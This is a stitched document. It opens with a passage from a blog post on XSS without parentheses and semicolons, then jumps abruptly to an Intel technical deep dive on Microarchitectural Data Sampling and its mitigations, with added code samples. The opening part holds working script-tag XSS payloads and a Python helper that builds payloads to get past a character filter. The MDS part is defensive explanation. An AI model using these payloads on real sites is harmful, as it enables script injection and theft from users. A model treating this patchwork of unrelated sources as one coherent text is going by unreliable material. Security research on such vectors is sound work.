After I posted this stuff on Twitter, @terjanq and @cgvwzq (Pepe Vila) followed up with some cool vectors. Here @terjanq removes all string literals:

```html
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
```

Pepe removed the need for the throw statement completely by using type errors to send a string to the exception handler:

```html
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
```
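Several vectors in this post spell parentheses inside a string literal as \x28 and \x29. The escapes keep the characters out of the page source, while the string's value still contains them when eval, acting as the onerror handler, runs it. Below are two small Python helpers: one produces such strings, and the other checks a payload against a filter that blocks (, ) and ; like the one described above. Both helpers are hypothetical and do not come from the original post.

```python
def hex_escape(js, chars="();"):
    """Rewrite selected characters as \\xNN escapes for use inside a JS string literal."""
    return "".join(f"\\x{ord(ch):02x}" if ch in chars else ch for ch in js)


def passes_filter(payload, banned="();"):
    """Mimic a filter that rejects any payload containing a banned character."""
    return not any(ch in payload for ch in banned)


payload = "<script>{onerror=eval}throw'=" + hex_escape("alert(1337)") + "'</script>"
print(payload)
print(passes_filter(payload))
```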

Gareth Heyes

Source: https://portswigger.net/blog/xss-without-parentheses-and-semi-colons

-

Deep Dive: Intel Analysis of Microarchitectural Data Sampling

This technical deep dive expands on the information in the Microarchitectural Data Sampling (MDS) guidance. Be sure to review the disclosure overview for software developers first and apply any microcode updates from your OS vendor.

How Microarchitectural Data Sampling (MDS) Works

MDS may allow a malicious user who can locally execute code on a system to infer the values of data otherwise protected by architectural mechanisms. Although it may be difficult to target particular data on a system using these methods, malicious actors may be able to infer protected data by collecting and analyzing large amounts of data. Refer to the MDS table in Deep dive: CPUID Enumeration and Architectural MSRs for a list of processors that may be affected by MDS. MDS only refers to methods that involve microarchitectural structures other than the level 1 data cache (L1D), and thus does not include Rogue Data Cache Load (RDCL) or L1 Terminal Fault (L1TF).

The MDS speculative execution side channel methods can be used to expose data in the following microarchitectural structures:

- Store buffers: Temporary buffers to hold store addresses and data.

- Fill buffers: Temporary buffers between CPU caches.

- Load ports: Temporary buffers used when loading data into registers.

These structures are much smaller than the L1D, and therefore hold less data and are overwritten more frequently. It is also more difficult to use MDS methods to infer data that is associated with a specific memory address, which may require the malicious actor to collect significant amounts of data and analyze it to locate any protected data.

New microcode updates (MCUs) are being released to help software mitigate these issues. Intel recommends updating the microcode and clearing microarchitectural buffers when switching to software that is not trusted by the previous software. These mitigations will require changes and updates to operating systems, hypervisors, and Intel® Software Guard Extensions (Intel® SGX).

The microarchitecture details in this document are applicable to the processors affected by MDS techniques and should not be considered universal for all Intel processors. Refer to CPUID Enumeration and Architectural MSRs for a list of affected processors.

Microarchitectural Store Buffer Data Sampling (MSBDS) CVE-2018-12126

When performing store operations, processors write data into a temporary microarchitectural structure called the store buffer. This enables the processor to continue to execute instructions following the store operation, before the data is written to cache or main memory. I/O writes (for example, OUT) are also held in the store buffer.

When a load operation reads data from the same memory address as an earlier store operation, the processor may be able to forward data to the load operation directly from the store buffer instead of waiting to load the data from memory or cache. This optimization is called store-to-load forwarding.
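Store-to-load forwarding can be pictured with a conceptual toy model. Pending stores sit in a queue, and a load first searches that queue (newest entry first) for a matching address before falling back to memory. The Python below is only a sketch. Real store buffers deal with partial overlaps, access sizes, and speculation, and the toy ignores all of that.

```python
from collections import deque


class StoreBuffer:
    """Toy store buffer: stores commit to memory in order; loads may be forwarded."""

    def __init__(self, memory):
        self.memory = memory    # dict address -> value, standing in for cache/RAM
        self.pending = deque()  # (address, value) pairs, oldest on the left

    def store(self, address, value):
        self.pending.append((address, value))

    def load(self, address):
        # Store-to-load forwarding: the newest pending store to this address wins.
        for addr, value in reversed(self.pending):
            if addr == address:
                return value, "forwarded"
        return self.memory.get(address, 0), "memory"

    def drain(self):
        # Commit pending stores to memory in program order.
        while self.pending:
            addr, value = self.pending.popleft()
            self.memory[addr] = value


sb = StoreBuffer({0x1000: 1})
sb.store(0x1000, 42)
print(sb.load(0x1000))  # (42, 'forwarded')
```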

Under certain conditions, data from a store operation can be speculatively forwarded from the store buffer to a faulting or assisting load operation for a different memory address. It is possible that a store does not overwrite the entire data field within the store buffer due to either the store being a smaller size than the store buffer width, or not yet having executed the data portion of the store. These cases can lead to data being forwarded that contains data from older stores. Because the load operation will cause a fault/assist[1] and its results will be discarded, the forwarded data does not result in incorrect program execution or architectural state changes. However, malicious actors may be able to forward this speculative-only data to a disclosure gadget in a way that allows them to infer this value.

Cross-thread Impacts of MSBDS

For processors affected by MSBDS, the store data buffer on a physical core is statically partitioned across the active threads on that core. This means a core with two active threads would have half of the store buffer entries used only for thread one and half only for the other. When a thread enters a sleep state, its store buffer entries may become usable by the other active thread. This causes store buffer entries that were previously used for the thread that is entering the sleep state (and may contain stale data) to be reused by the other (active) thread. When a thread wakes from a sleep state, the store buffer is repartitioned again. This causes the store buffer to transfer store buffer entries from the thread that was already active to the one which just woke up.

Microarchitectural Fill Buffer Data Sampling (MFBDS) CVE-2018-12130

A fill buffer is an internal structure used to gather data on a first level data cache miss. When a memory request misses the L1 data cache, the processor allocates a fill buffer to manage the request for the data cache line. The fill buffer also temporarily manages data that is returned or sent in response to a memory or I/O operation. Fill buffers can forward data to load operations and also write data to the data cache. Once the data from the fill buffer is written to the cache (or otherwise consumed when the data will not be cached), the processor deallocates the fill buffer, allowing that entry to be reused for future memory operations.

Fill buffers may retain stale data from prior memory requests until a new memory request overwrites the fill buffer. Under certain conditions, the fill buffer may speculatively forward data, including stale data, to a load operation that will cause a fault/assist. This does not result in incorrect program execution because faulting/assisting loads never retire and therefore do not modify the architectural state. However, a disclosure gadget may be able to infer the data in the forwarded fill buffer entry through a side channel timing analysis.

Cross-thread Impacts of MFBDS

Fill buffers are shared between threads on the same physical core without any partitioning. Because fill buffers are dynamically allocated between sibling threads, the stale data in a fill buffer may belong to a memory access made by the other thread. For example, in a scenario where different applications are being executed on sibling threads, if one of those applications is under the control of a malicious actor, it may be possible under a specific set of conditions to use MFBDS to infer some of the victim's data values through the fill buffers.

Microarchitectural Load Port Data Sampling (MLPDS) CVE-2018-12127

Processors use microarchitectural structures called load ports to perform load operations from memory or I/O. During a load operation, the load port receives data from the memory or I/O system, and then provides that data to the register file and younger dependent operations. In some implementations, the writeback data bus within each load port can retain data values from older load operations until younger load operations overwrite that data.

Microarchitectural Load Port Data Sampling (MLPDS) can reveal stale load port data to malicious actors in these cases:

- A faulting/assisting vector (SSE/Intel® AVX/Intel® AVX-512) load that is more than 64 bits in size

- A faulting/assisting load which spans a 64-byte boundary

In these cases, faulting/assisting load operations speculatively provide stale data values from the internal data structures to younger dependent operations. The faulting/assisting load operations never retire and therefore do not modify the architectural state. However, the younger dependent operations that receive the stale data may be part of a disclosure gadget that can reveal the stale data values to a malicious actor.
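The two load shapes listed above can be expressed as simple predicates. The sketch below is a hypothetical helper, not part of any Intel tooling. It only classifies a load by size and address; it says nothing about whether the load actually faults or needs an assist, which is the other precondition for MLPDS.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* True if a load of `size` bytes at `addr` spans a 64-byte boundary, i.e.
 * its first and last bytes fall in different 64-byte-aligned blocks. */
static bool crosses_64b_boundary(uintptr_t addr, size_t size)
{
    if (size == 0)
        return false;
    return (addr / 64) != ((addr + size - 1) / 64);
}

/* The load shapes called out for MLPDS: a vector load wider than 64 bits,
 * or any load spanning a 64-byte boundary. Shape check only. */
static bool mlpds_relevant_shape(uintptr_t addr, size_t size, bool is_vector)
{
    bool wide_vector = is_vector && size * 8 > 64;
    return wide_vector || crosses_64b_boundary(addr, size);
}
```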

Cross-thread Impacts of MLPDS

Load ports are shared between threads on the same physical core. Because load ports are dynamically allocated between threads, the stale data in a load port may belong to a memory access made by the other thread. For example, in a scenario where different applications are being executed on sibling threads, if one of those applications is under the control of a malicious actor, it may be possible under a specific set of conditions to use MLPDS to infer some of the victim's data values through the load ports.

Microarchitectural Data Sampling Uncacheable Memory (MDSUM) CVE-2019-11091

Data accesses that use the uncacheable (UC) memory type do not fill new lines into the processor caches. On processors affected by Microarchitectural Data Sampling Uncacheable Memory (MDSUM), load operations that fault or assist to uncacheable memory may still speculatively see the data value from those core or data accesses. Because uncacheable memory accesses still move data through store buffers, fill buffers, and load ports, and those data values may be speculatively returned on faulting or assisting loads, malicious actors can observe these data values through the MSBDS, MFBDS, and MLPDS mechanisms discussed above.

Mitigations for Microarchitectural Data Sampling Issues

Hardware Mitigations

Future and some current processors will have microarchitectural data sampling methods mitigated in the hardware. For a complete list of affected processors, refer to the MDS table in Deep dive: CPUID Enumeration and Architectural MSRs.

The following MSR enumeration enables software to check if the processor is affected by MDS methods:

- IA32_ARCH_CAPABILITIES[0]: RDCL_NO. A value of 1 indicates that the processor is not affected by RDCL or L1TF. In addition, a value of 1 indicates that the processor is not affected by MFBDS.

- IA32_ARCH_CAPABILITIES[5]: MDS_NO. A value of 1 indicates that the processor is not affected by MFBDS/MSBDS/MLPDS/MDSUM.

Note that MFBDS is mitigated if either the RDCL_NO or MDS_NO bit (or both) are set. Some existing processors may also enumerate either RDCL_NO or MDS_NO only after a microcode update is loaded.

Mitigations for Affected Processors

The mitigation for microarchitectural data sampling issues includes clearing store buffers, fill buffers, and load ports before transitioning to possibly less privileged execution entities (for example, before the operating system (OS) executes an IRET or SYSRET instruction to return to an application).

There are two methods to overwrite the microarchitectural buffers affected by MDS: MD_CLEAR functionality and software sequences.

Processor Support for Buffer Overwriting (MD_CLEAR)

Intel will release microcode updates and new processors that enumerate MD_CLEAR functionality[2]. On processors that enumerate MD_CLEAR[3], the VERW instruction or L1D_FLUSH command[4] should be used to cause the processor to overwrite buffer values that are affected by MDS, as these instructions are preferred to the software sequences.

The VERW instruction and L1D_FLUSH command[4] will overwrite the store buffer value for the current logical processor on processors affected by MSBDS. For processors affected by MFBDS, these instructions will overwrite the fill buffer for all logical processors on the physical core. For processors affected by MLPDS, these instructions will overwrite the load port writeback buses for all logical processors on the physical core. Processors affected by MDSUM are also affected by one or more of MFBDS, MSBDS, or MLPDS, so overwriting the buffers as described above will also overwrite any buffer entries holding uncacheable data.

VERW buffer overwriting details

The VERW instruction is already defined to return whether a segment is writable from the current privilege level. MD_CLEAR enumerates that the memory-operand variant of VERW (for example, VERW m16) has been extended to also overwrite buffers affected by MDS.

This buffer overwriting functionality is not guaranteed for the register operand variant of VERW. The buffer overwriting occurs regardless of the result of the VERW permission check, as well as when the selector is null or causes a descriptor load segment violation. However, for lowest latency we recommend using a selector that indicates a valid writable data segment.

Example usage[5]:

```asm
MDS_buff_overwrite:
    sub  $8, %rsp
    mov  %ds, (%rsp)      # store the current DS selector on the stack
    verw (%rsp)           # memory-operand VERW overwrites MDS buffers
    add  $8, %rsp
    ret
```
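For C code built with GCC or Clang, the assembly example above could be written as inline assembly along the following lines. This is a sketch under stated assumptions: the function name `mds_buff_overwrite` is hypothetical, it uses whatever selector DS currently holds (which may not be a writable data segment; per the text the overwrite still happens, but latency may not be lowest), and it compiles to nothing on non-x86 builds. The `"cc"` clobber reflects that VERW writes ZF.

```c
#include <stdint.h>

/* Hypothetical wrapper: overwrite MDS-affected buffers using the
 * memory-operand form of VERW (the form MD_CLEAR extends). */
static inline void mds_buff_overwrite(void)
{
#if defined(__x86_64__) || defined(__i386__)
    uint16_t sel;
    /* Read the current DS selector, as the assembly example does. */
    __asm__ __volatile__("mov %%ds, %0" : "=r"(sel));
    /* "m" forces a memory operand; VERW updates ZF, hence "cc".
     * "memory" stops the compiler moving memory accesses across it. */
    __asm__ __volatile__("verw %0" : : "m"(sel) : "cc", "memory");
#endif
}
```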

Note that the VERW instruction updates the ZF bit in the EFLAGS register, so exercise caution when using the above sequence in-line in existing code. Also note that the VERW instruction is not executable in real mode or virtual-8086 mode.

The microcode additions to VERW will correctly overwrite all relevant microarchitectural buffers for a logical processor regardless of what is executing on the other logical processor on the same physical core.

VERW fall-through speculation

Some processors that enumerate MD_CLEAR support may speculatively execute instructions immediately following VERW. This speculative execution may happen before the speculative instruction pipeline is cleared by the VERW buffer overwrite functionality.

Because of this possibility, a speculation barrier should be placed between invocations of VERW and the execution of code that must not observe protected data through MDS.

To illustrate this possibility, consider the following instruction sequence:

- Code region A

- VERW m16

- Code region B

- Speculation barrier (for example, LFENCE)

- Code region C

Suppose that protected data may be accessed by instructions in code region A. The VERW instruction overwrites any data that instructions in code region A place in MDS-affected buffers. However, instructions in code region B may speculatively execute before the buffer overwrite occurs. Because loads in code region C execute after the speculation barrier, they will not observe protected data placed in the buffers by code region A.

When used with VERW, the following are examples of suitable speculation barriers on affected processors:

- LFENCE

- Any change of current privilege level (such as SYSRET returning from supervisor to user mode)

- VM enter or VM exit

- MWAIT that successfully enters a sleep state

- WRPKRU instruction

- Architecturally serializing instructions or events
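The in-process case described next (a VERW; LFENCE pairing between security subdomains) might look like this in C. The sketch assumes GCC/Clang inline assembly on x86; `current_domain` and `switch_subdomain` are hypothetical bookkeeping, included only to show where the barrier sits relative to code of the next domain (code region C in the sequence above).

```c
#include <stdint.h>

/* Hypothetical id of the security subdomain currently executing. */
static int current_domain;

/* Switch to subdomain `next`: overwrite MDS-affected buffers with VERW,
 * then LFENCE so code of the new domain cannot execute speculatively
 * before the overwrite completes. Returns the previous domain id. */
static int switch_subdomain(int next)
{
#if defined(__x86_64__) || defined(__i386__)
    uint16_t sel;
    __asm__ __volatile__("mov %%ds, %0" : "=r"(sel));
    __asm__ __volatile__("verw %0\n\t"
                         "lfence"
                         : /* no outputs */
                         : "m"(sel)
                         : "cc", "memory");
#endif
    int prev = current_domain;
    current_domain = next;
    return prev;
}
```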

For example, if the OS uses VERW prior to the transition from ring 0 to ring 3, the ring transition itself is a suitable speculation barrier. If VERW is used between security subdomains within a process, a suitable speculation barrier might be a VERW; LFENCE sequence.

Software Sequences for Buffer Overwrite

On processors that do not enumerate the MD_CLEAR functionality[2], certain instruction sequences may be used to overwrite buffers affected by MDS. These sequences are described in detail in the Software Sequences to Overwrite Buffers section.

Different processors may require different sequences to overwrite the buffers affected by MDS. Some requirements for the software sequences are listed below:

- On processors that support simultaneous multithreading[6] (SMT), other threads on the same physical core should be quiesced during the sequence so that they do not allocate fill buffers. This allows the current thread to overwrite all of the fill buffers. In particular, these quiesced threads should not perform any loads or stores that might miss the L1D cache. A quiesced thread should loop on the PAUSE instruction to limit cross-thread interference during the sequence.

- For sequences that rely on REP string instructions, the MSR bit IA32_MISC_ENABLE[0] must be set to 1 so that fast strings are enabled.

When to overwrite buffers

Store buffers, fill buffers, and load ports should be overwritten whenever switching to software that is not trusted by the previous software. If software ensures that no protected data exists in any of these buffers then the buffer overwrite can be avoided.

OS

The OS can execute the VERW instruction[2] to overwrite any protected data in affected buffers when transitioning from ring 0 to ring 3. This will overwrite protected data in the buffers that could belong to the kernel or other applications. When SMT is active, this instruction should also be executed before entering C-states, as well as between exiting C-states and transitioning to untrusted code.

Intel® Software Guard Extensions (Intel® SGX)

When entering or exiting Intel® Software Guard Extensions (Intel® SGX) enclaves, processors that enumerate support for MD_CLEAR will automatically overwrite affected data buffers.

Virtual Machine Managers (VMMs)

The VMM can execute either the VERW instruction or the L1D_FLUSH command[4] before entering a guest VM. This will overwrite protected data in the buffers that could belong to the VMM or other VMs. VMMs that already use the L1D_FLUSH command before entering guest VMs to mitigate L1TF may not need further changes beyond loading a microcode update that enumerates MD_CLEAR.

While a VMM may issue L1D_FLUSH on only one thread to flush the data in the L1D, fill buffers, and load ports for all threads in the core, only the store buffers for the current thread are cleared. When the other thread next enters a guest, a VERW may be needed to overwrite the store buffers belonging to the other thread.

System Management Mode (SMM)

Exposure of system management mode (SMM) data to software that subsequently runs on the same logical processor can be mitigated by overwriting buffers when exiting SMM. On processors that enumerate MD_CLEAR[2], the processor will automatically overwrite the affected buffers when the RSM instruction is executed.

Security Domains within a Process

Software using language-based security may transition between different trust domains. When transitioning between trust domains, a VERW instruction can be used to clear buffers.

Site isolation, as discussed in Deep Dive: Managed Runtime Speculative Execution Side Channel Mitigations, may be a more effective technique for dealing with speculative execution side channels in general.

Mitigations for Environments Utilizing Simultaneous Multithreading (SMT)

OS

The OS must employ two different methods to prevent a thread from using MDS to infer data values used by the sibling thread. The first (group scheduling) protects against user vs. user attacks. The second (synchronized entry) protects kernel data from an attacker running in user mode on one thread while the other thread executes kernel code.

Group scheduling

The OS can prevent a sibling thread from running malicious code when the current thread crosses security domains. The OS scheduler can reduce the need to control sibling threads by ensuring that software workloads sharing the same physical core mutually trust each other (for example, if they are in the same application defined security domain) or ensuring the other thread is idle.

The OS can enforce such a trusted relationship between workloads either statically (for example, through task affinity or cpusets), or dynamically through a group scheduler in the OS (sometimes called a core scheduler). The group scheduler should prefer processes with the same trust domain on the sibling core, but only if no other idle core is available. This may affect load balancing decisions between cores. If a process from a compatible trust domain is not available, the scheduler may need to idle the sibling thread.
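A group scheduler's core decision can be reduced to a compatibility check between the task about to run and whatever the sibling thread is running. The sketch below is hypothetical: the `struct task` layout, the `trust_domain` ids and the `IDLE_TASK` marker are illustrative and not taken from any real OS, and load balancing is ignored. It encodes "same trust domain or idle sibling", and falls back to idling the sibling when no compatible task is available.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical marker for a hardware thread that is idle. */
#define IDLE_TASK (-1)

/* Tasks with the same trust_domain id are assumed to trust each other. */
struct task { int trust_domain; };

/* May `next` run while the sibling thread runs `sibling`? */
static bool can_corun(const struct task *next, const struct task *sibling)
{
    if (sibling == NULL || sibling->trust_domain == IDLE_TASK)
        return true;                 /* idle sibling: nothing to attack */
    return next->trust_domain == sibling->trust_domain;
}

/* Choose a task for the sibling of a thread running `running`: the first
 * compatible candidate, or -1 meaning "leave the sibling idle". */
static int pick_for_sibling(const struct task *running,
                            const struct task *cands, int n)
{
    for (int i = 0; i < n; i++)
        if (can_corun(&cands[i], running))
            return i;
    return -1;
}
```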

Figure 1: System without group scheduling

Figure 2: System with group scheduling

Figure 1 shows a three-core system where Core 2 is running processes from different security domains. These processes would be able to use MDS to infer protected data from each other. Figure 2 shows how a group scheduler removes the possibility of process-to-process attacks by ensuring that no core runs processes from different security domains at the same time.

Synchronized ring 0 entry and exit using IPIs

The OS needs to take action when the current hardware thread makes transitions from user code (application code) to kernel code (ring 0 mode). This can happen as part of a system call or an asynchronous event such as an interrupt; in that case the sibling thread may not be allowed to execute in user mode, because kernel code may not trust user code. In a simplified view of an operating system we can consider each thread to be in one of three states:

- Idle

- Ring 0 (kernel code)

- User (application code)

Figure 3 below shows the state transitions to keep the kernel safe from a malicious application.

Figure 3: Thread rendezvous

Each node in the figure above shows the possible execution states of the two threads that share a physical core.
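Because Figure 3 is not reproduced here, the mapping from per-thread states to the figure's nodes can be written out explicitly. This is a sketch: the enum names are hypothetical, and which thread corresponds to the "a" or "b" variant of a node is an assumption, since the text only says it depends on which thread is involved. The second helper encodes the rule given later in this section for states 6a and 6b.

```c
#include <stdbool.h>

/* Per-thread execution state in the simplified OS model. */
enum tstate { T_IDLE, T_KERNEL, T_USER };

/* Map the two sibling threads' states to a Figure 3 node label.
 * Assumption: "a" means thread 0 is the kernel/active thread. */
static const char *core_state(enum tstate t0, enum tstate t1)
{
    if (t0 == T_IDLE && t1 == T_IDLE)     return "1";
    if (t0 == T_KERNEL && t1 == T_IDLE)   return "2a";
    if (t0 == T_IDLE && t1 == T_KERNEL)   return "2b";
    if (t0 == T_USER && t1 == T_IDLE)     return "3a";
    if (t0 == T_IDLE && t1 == T_USER)     return "3b";
    if (t0 == T_KERNEL && t1 == T_KERNEL) return "4";
    if (t0 == T_USER && t1 == T_USER)     return "5";
    return t0 == T_KERNEL ? "6a" : "6b";  /* one kernel, one user */
}

/* In 6a/6b the kernel-side thread should not touch data protected from a
 * sibling that is running user code; it must first rendezvous both
 * threads in the kernel (state 4) with an IPI. */
static bool kernel_may_touch_protected(enum tstate sibling)
{
    return sibling != T_USER;
}
```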

Starting at state 1, both threads are idle. From this state, an interrupt will transition the core to state 2a or 2b depending on which thread is interrupted. If there are no user tasks to run, the physical core transitions back to state 1 upon completion of the interrupt. If the idle state is implemented using processor C-states, then VERW should be executed before entry to C-states on processors affected by MSBDS.

From 2a or 2b, a thread may begin running a user process. As long as the other thread on the core remains idle, SMT-specific mitigations are not needed when transitioning from 2a to 3a or 2b to 3b, although the OS needs to overwrite buffers by executing VERW before transitioning to 3a or 3b.

Alternatively, from 2a or 2b the physical core may transition to state 4 if an interrupt wakes the sibling thread. The physical core may return to 2a or 2b if that interrupt does not result in the core running a user process.

From state 4, the core can transition to state 5 and begin executing user code on both threads. The OS must ensure that the transition to state 5 prevents the thread that first enters user code from performing an attack on protected data in the microarchitectural buffers of the other thread. The OS should also execute VERW on both threads. There is no hardware support for atomic transition of both threads between kernel and user states, so the OS should use standard software techniques to synchronize the threads. The OS should also take care at the boundary points to avoid loading protected data into microarchitectural buffers when one or both threads are transitioning to user mode. Note that the kernel should only enter state 5 when running two user threads from the same security domain (as described in the group scheduling section above).

The core may enter state 6a or 6b either from state 5, because one of the threads leaves user mode, or from state 3a or 3b, because an interrupt woke a thread from the idle state. When in state 6a or 6b, the OS should avoid accessing any data that is considered protected with respect to the sibling thread in user mode. If the thread in kernel state needs to access protected data, the OS should transition from state 6a or 6b to state 4. The thread in kernel state should use an interprocessor interrupt (IPI) to rendezvous the two threads in kernel state in order to transition the core to state 4. When the kernel thread is ready to leave the kernel state (either by going into the idle state or returning to the user state), the sibling thread can be allowed to exit the IPI service routine and return to running in user state itself after executing a VERW.

Disable simultaneous multithreading (SMT)

Another method to prevent the sibling thread from inferring data values through MDS is to disable SMT either through the BIOS or by having the OS only schedule work on one of the threads.
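On Linux, one way to check whether SMT is currently active is the sysfs file `/sys/devices/system/cpu/smt/active`, which newer kernels expose alongside a `control` file that can be used to turn SMT off at runtime. This is Linux-specific and not part of the Intel guidance. The sketch below, with hypothetical function names, only reads the status and reports -1 when the file is absent (older kernels or other operating systems).

```c
#include <stdio.h>

/* Parse a sysfs boolean such as "1\n" or "0\n"; -1 if unrecognised. */
static int parse_sysfs_bool(const char *s)
{
    if (s[0] == '1') return 1;
    if (s[0] == '0') return 0;
    return -1;
}

/* Linux-specific: 1 if SMT is active, 0 if not, -1 if unknown. */
static int smt_active(void)
{
    char buf[8] = {0};
    FILE *f = fopen("/sys/devices/system/cpu/smt/active", "r");
    if (!f)
        return -1;
    if (!fgets(buf, sizeof buf, f)) {
        fclose(f);
        return -1;
    }
    fclose(f);
    return parse_sysfs_bool(buf);
}
```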

SMT mitigations for Atom and Knights family processors

Some processors that are affected by MDS (MDS_NO is 0) do not need mitigation for the other sibling thread. Specifically, any processor that does not support SMT (for example, processors based on the Silvermont and Airmont microarchitectures) does not need SMT mitigation.

Processors based on the Knights Landing or Knights Mill microarchitectures do not need group scheduling or synchronized exit/entry to mitigate against MDS attacks from the sibling threads. This is because these processors are only affected by MSBDS, and the store data buffers are only shared between threads when entering/exiting C-states. On such processors, the store buffers should be overwritten when entering C-states, as well as between exiting C-states and transitioning to untrusted code. The only processors with four threads per core that are affected by MDS (do not enumerate MDS_NO) are Knights family processors.

Virtual Machine Manager (VMM)

Mitigations for MDS parallel those needed to mitigate L1TF. Processors that enumerate MD_CLEAR have enhanced the L1D_FLUSH command[4] to also overwrite the microarchitectural structures affected by MDS. This can allow VMMs that have mitigated L1TF through group scheduling and through using the L1D_FLUSH command to also mitigate MDS. The VMM mitigation may need to be applied to processors that are not affected by L1TF (RDCL_NO is set) but are affected by MDS (MDS_NO is clear). VMMs on such processors can use VERW instead of the L1D_FLUSH command. VMMs that have implemented the L1D flush using a software sequence should use a VERW instruction to overwrite microarchitectural structures affected by MDS.

Note that even if the VMM issues L1D_FLUSH on only one thread to flush the data for all threads in the core, the store buffers are cleared only for the current thread. When the other thread next enters a guest, a VERW may be needed to overwrite the store buffers belonging to that thread.

Intel® SGX

The Intel SGX security model does not trust the OS scheduler to ensure that software workloads running on sibling threads mutually trust each other. For processors impacted by cross-thread MDS, the Intel SGX remote attestation reflects whether SMT is enabled by the BIOS. An Intel SGX remote attestation verifier can evaluate the risk of potential cross-thread attacks when SMT is enabled on the platform and decide whether to trust an enclave on the platform to secure specific protected data.

SMM

SMM is a special processor mode used by BIOS. Processors that enumerate MD_CLEAR and are affected by MDS will automatically flush the affected microarchitectural structures during the RSM instruction that exits SMM.

SMM software must rendezvous all logical processors both on entry to and exit from SMM to ensure that a sibling logical processor does not reload data into microarchitectural structures after the automatic flush. We believe most SMM software already does this. This ensures that non-SMM software does not run while data that belong to SMM are in microarchitectural structures. Such SMM implementations do not require any software changes to be fully mitigated for MDS. Implementations that allow a logical processor to execute in SMM while another logical processor on the same physical core is not in SMM need to be reviewed to see if any protected data from SMM could be loaded into microarchitectural structures, and thus would be vulnerable to MDS from another logical processor.

CPUID Enumeration

For a full list of affected processors, refer to the MDS table in Deep dive: CPUID Enumeration and Architectural MSRs.

CPUID.(EAX=7H,ECX=0):EDX[MD_CLEAR=10] enumerates support for additional functionality that will flush microarchitectural structures as listed below.

- On execution of the (existing) VERW instruction where its argument is a memory operand.

- On setting the L1D_FLUSH command[4] bit in the IA32_FLUSH_CMD MSR.

- On execution of the RSM instruction.

- On entry to, or exit from, an Intel SGX enclave.
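The enumeration above can be queried from user space. A minimal sketch, assuming GCC 7 or later (or Clang) on x86, where `<cpuid.h>` provides `__get_cpuid_count`; the struct and function names are hypothetical. The decoder is kept separate from the query so it can be checked without specific hardware. In a guest VM, the values reflect whatever the VMM chooses to expose.

```c
#include <stdbool.h>
#include <stdint.h>
#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>
#endif

#define LEAF7_EDX_MD_CLEAR  (1u << 10)  /* CPUID.(EAX=7H,ECX=0):EDX[10] */
#define LEAF7_EDX_L1D_FLUSH (1u << 28)  /* CPUID.(EAX=7H,ECX=0):EDX[28] */

struct md_features { bool md_clear; bool l1d_flush; };

/* Pure decoder for the EDX value of CPUID leaf 7, subleaf 0. */
static struct md_features decode_leaf7_edx(uint32_t edx)
{
    struct md_features f = {
        .md_clear  = (edx & LEAF7_EDX_MD_CLEAR) != 0,
        .l1d_flush = (edx & LEAF7_EDX_L1D_FLUSH) != 0,
    };
    return f;
}

/* Query the running CPU. Returns false if leaf 7 is not supported or the
 * build is not for x86. */
static bool query_md_features(struct md_features *out)
{
#if defined(__x86_64__) || defined(__i386__)
    unsigned int eax, ebx, ecx, edx;
    if (!__get_cpuid_count(7, 0, &eax, &ebx, &ecx, &edx))
        return false;
    *out = decode_leaf7_edx(edx);
    return true;
#else
    (void)out;
    return false;
#endif
}
```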

Note: Future processors set the MDS_NO bit in IA32_ARCH_CAPABILITIES to indicate they are not affected by microarchitectural data sampling. Such processors will continue to enumerate the MD_CLEAR bit in CPUID. As none of these data buffers are vulnerable to exposure on such parts, no data buffer overwriting is required or expected for such parts, despite the MD_CLEAR indication. Software should look to the MDS_NO bit to determine whether buffer overwriting mitigations are required.

Note: For Intel SGX, the MD_CLEAR and MDS_NO bits are also indirectly reflected in the Intel SGX Remote Attestation data.

Note: All processors affected by MSBDS, MFBDS, or MLPDS are also affected by MDSUM for the relevant buffers. For example, a processor that is only affected by MSBDS but is not affected by MFBDS or MLPDS would also be affected by MDSUM for store buffer entries only.
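Combining these notes with the MSR bits listed earlier (RDCL_NO at bit 0 and MDS_NO at bit 5 of IA32_ARCH_CAPABILITIES), the choice of mitigation can be written as a small decision function. This is a hypothetical sketch of that logic, not Intel's or any OS's actual implementation. It covers MDS only (L1TF handling, which may still require L1D_FLUSH, is out of scope) and takes the raw MSR value and CPUID bits as inputs rather than reading them.

```c
#include <stdbool.h>
#include <stdint.h>

#define ARCH_CAP_RDCL_NO (1ull << 0)  /* IA32_ARCH_CAPABILITIES[0] */
#define ARCH_CAP_MDS_NO  (1ull << 5)  /* IA32_ARCH_CAPABILITIES[5] */

enum mds_mitigation {
    MDS_NONE,         /* MDS_NO set: no buffer overwriting required */
    MDS_VERW,         /* MD_CLEAR enumerated: memory-operand VERW */
    MDS_L1D_FLUSH,    /* VMM on an L1TF-affected part: L1D_FLUSH also covers MDS */
    MDS_SW_SEQUENCE,  /* no MD_CLEAR: model-specific software sequence */
};

/* OS side: MDS_NO takes precedence even if MD_CLEAR is also enumerated. */
static enum mds_mitigation os_choice(uint64_t arch_caps, bool md_clear)
{
    if (arch_caps & ARCH_CAP_MDS_NO)
        return MDS_NONE;
    return md_clear ? MDS_VERW : MDS_SW_SEQUENCE;
}

/* VMM side, before VM entry. */
static enum mds_mitigation vmm_choice(uint64_t arch_caps, bool md_clear,
                                      bool l1d_flush)
{
    if (arch_caps & ARCH_CAP_MDS_NO)
        return MDS_NONE;
    if (!md_clear)
        return MDS_SW_SEQUENCE;
    if (arch_caps & ARCH_CAP_RDCL_NO)   /* not affected by L1TF */
        return MDS_VERW;
    return l1d_flush ? MDS_L1D_FLUSH : MDS_VERW;
}
```

A VMM that issues L1D_FLUSH on one thread would still need a VERW when the sibling thread next enters a guest, because L1D_FLUSH clears only the current thread's store buffers.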

Software Sequences to Overwrite Buffers

On processors that do not enumerate the MD_CLEAR functionality, the following instruction sequences may be used to overwrite buffers affected by MDS. On processors that do enumerate MD_CLEAR, the VERW instruction or L1D_FLUSH command[4] should be used instead of these software sequences.

The software sequences use the widest available memory operations on each processor model to ensure that all of the upper order bits are overwritten. System management interrupts (SMI), interrupts, or exceptions that occur during the middle of these sequences may cause smaller memory accesses to execute which only overwrite the lower bits of the buffers. In this case, when the sequence completes, some of the buffer entries may be overwritten twice, while only the lower bits of other buffer entries are overwritten. Extra operations could be performed to minimize the chance of interrupts/exceptions causing the upper order bits of the buffer entries to persist.

